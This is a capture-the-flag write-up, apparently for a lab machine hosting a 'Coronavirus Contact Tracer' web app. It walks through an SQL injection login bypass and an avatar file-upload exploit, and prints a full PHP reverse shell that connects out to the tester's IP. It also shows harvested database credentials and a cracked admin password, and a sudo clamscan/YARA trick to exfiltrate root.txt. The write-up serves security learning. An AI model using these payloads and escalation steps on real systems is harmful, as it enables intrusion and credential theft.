# Enumeration
## NMAP
```txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 27:1d:c5:8a:0b:bc:02:c0:f0:f1:f5:5a:d1:ff:a4:63 (RSA)
|   256 ce:f7:60:29:52:4f:65:b1:20:02:0a:2d:07:40:fd:bf (ECDSA)
|_  256 a5:b5:5a:40:13:b0:0f:b6:5a:5f:21:60:71:6f:45:2e (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Coronavirus Contact Tracer
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

## Web
- We get an error
```txt
We can’t connect to the server at contacttracer.thm.
```
- Add that to our `/etc/hosts` so it resolves.
- We have a login page at `/login.php`.
- I noticed when sending a login request it's showing the query in the Networks tab.
```sql
1.  last_qry: "SELECT * from users where username = 'test' and password = md5('test') "
2.  status: "incorrect"
```
Let's try some basic SQL injections.
```sql
' OR 1=1-- -
```
- And we can login!
- How that happened? Well take a look at this query.
```sql
"SELECT * from users where username = '' OR 1=1-- -' and password = md5('test') "
```
We close the first bracket and terminate the others with a comment.
### Feroxbuster
```bash
301        9l       28w      322c http://contacttracer.thm/admin
200        9l       36w      281c http://contacttracer.thm/admin/404.html
301        9l       28w      322c http://contacttracer.thm/build
301        9l       28w      324c http://contacttracer.thm/classes
200        0l        0w        0c http://contacttracer.thm/config.php
200        1l        5w       71c http://contacttracer.thm/classes/Login.php
200        0l        0w        0c http://contacttracer.thm/classes/Main.php
200        0l        0w        0c http://contacttracer.thm/classes/People.php
200        1l        1w        4c http://contacttracer.thm/classes/TEST.php
301        9l       28w      321c http://contacttracer.thm/dist
301        9l       28w      327c http://contacttracer.thm/admin/city
500       32l       85w     1240c http://contacttracer.thm/home.php
301        9l       28w      329c http://contacttracer.thm/build/config
301        9l       28w      320c http://contacttracer.thm/inc
200      396l     1022w        0c http://contacttracer.thm/index.php
500        1l        2w       15c http://contacttracer.thm/admin/home.php
301        9l       28w      326c http://contacttracer.thm/admin/inc
301        9l       28w      325c http://contacttracer.thm/dist/css
301        9l       28w      324c http://contacttracer.thm/plugins
301        9l       28w      329c http://contacttracer.thm/admin/people
301        9l       28w      325c http://contacttracer.thm/dist/img
500        0l        0w        0c http://contacttracer.thm/admin/city/index.php
301        9l       28w      324c http://contacttracer.thm/dist/js
```

- Okay so not much to do.
- We can feed this to SQLMAP to see what tables and database it can find.

# Foothold
- I tried this [exploit](https://www.exploit-db.com/exploits/49604), and it doesn't seem to work.
- There is also an exploit for [arbitary file upload](https://www.exploit-db.com/exploits/50114). But it doesn't work out of the box. But it does give us a lot of information.
- Okay, after looking at the exploit, it's exploiting the avatar feature for the login page. Basically we can change the picture for the login page.
- Now let's upload a shell.php
```php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.17.1.163';
$port = 9001;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>
```
- Now let's setup a listener and logout.
- Now when we head to `/login.php` the picture will try to load and we should get a shell.
```txt
[07:27:58] received connection from 10.10.216.67:37394
```


# Internal Enumeration.
- config.php
```php
dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
```
- Not sure what this is for.
- Run linpeas
## Interesting Findings
```bash
/var/www/.config/lxc/config.yml
/var/www/html/classes/DBConnection.php

```
- Credentials in DBConnection.php
```bash
    private $username = 'cts';
    private $password = 'YOUMKtIXoRjFgMqDJ3WR799tvq2UdNWE';
```
- We can login using those credentials and find the hash for the admin user.
- We get the hash for user Admin `3eba6f73c19818c36ba8fea761a3ce6d` and cracked value is `sweetpandemonium`
- We can try to escalate to user cyrus/maxine using the password.
- We ended up escalating as cyrus.

# Privilege Escalation
- Found interesting script in /opt
```bash
#!/bin/bash

read -p "Enter path: " TARGET

if [[ -e "$TARGET" && -r "$TARGET" ]]
  then
    /usr/bin/clamscan "$TARGET" --copy=/home/cyrus/quarantine
    /bin/chown -R cyrus:cyrus /home/cyrus/quarantine
  else
    echo "Invalid or inaccessible path."
fi
```
- The script basically runs an antivirus scan on the target and if it's malicious then copy it to our qurantine directory and set it as our file.
- We can run as root on
```bash
User cyrus may run the following commands on lockdown:
    (root) /opt/scan/scan.sh
```

- My thoughts of process on how to get root is how do I make root.txt malicious.
- I searched on `clamav custom signatures` and found the [docs for it](https://docs.clamav.net/manual/Signatures.html)
- And we can make rules with Yara.
- Yara is basically pattern matching to identify malware and malicious files. The templates are also very read-able.
- Now first, let's find where everything is stored. The config file, we need to find it.
- It's stored in `/etc/clamav/freshclam.conf`.
```txt
DatabaseOwner clamav
UpdateLogFile /var/log/clamav/freshclam.log
LogVerbose false
LogSyslog false
LogFacility LOG_LOCAL6
LogFileMaxSize 0
LogRotate true
LogTime true
Foreground false
Debug false
MaxAttempts 5
DatabaseDirectory /var/lib/clamav
DNSDatabaseInfo current.cvd.clamav.net
ConnectTimeout 30
ReceiveTimeout 30
TestDatabases yes
ScriptedUpdates yes
CompressLocalDatabase no
SafeBrowsing false
Bytecode true
NotifyClamd /etc/clamav/clamd.conf
# Check for new database 24 times a day
Checks 24
DatabaseMirror db.local.clamav.net
DatabaseMirror database.clamav.net
```
- Then I found out that the database is stored at `/var/lib/clamav`
- There are 1 file that interesting there which is `main.hdb` which is file for identifying the virus in our home directory.
```txt
69630e4574ec6798239b091cda43dca0:69:EICAR_MD5
```
- Okay so how about we create our own rule for a virus?
- I searched online on how to create a yara rule on google. And this is how mine looks.
```bash
rule test1
{
	strings:
		$a = "THM{"
	condition:
		$a
}
```
- Basically if the string of `THM{` is present in the file. Mark it as a virus.
- So since we know the flag starts with `THM{` it should be flagged as a virus.
- Let's run it.
```bash
Enter path: /root
/root/.bashrc: OK
/root/root.txt: YARA.test1.UNOFFICIAL FOUND
/root/root.txt: copied to '/home/cyrus/quarantine/root.txt'
/root/.profile: OK

----------- SCAN SUMMARY -----------
Known viruses: 2
Engine version: 0.103.2
Scanned directories: 1
Scanned files: 3
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.011 sec (0 m 0 s)
Start Date: 2021:10:02 13:30:08
End Date:   2021:10:02 13:30:08
```
- And root.txt was marked as a virus! We should be able to read it now.




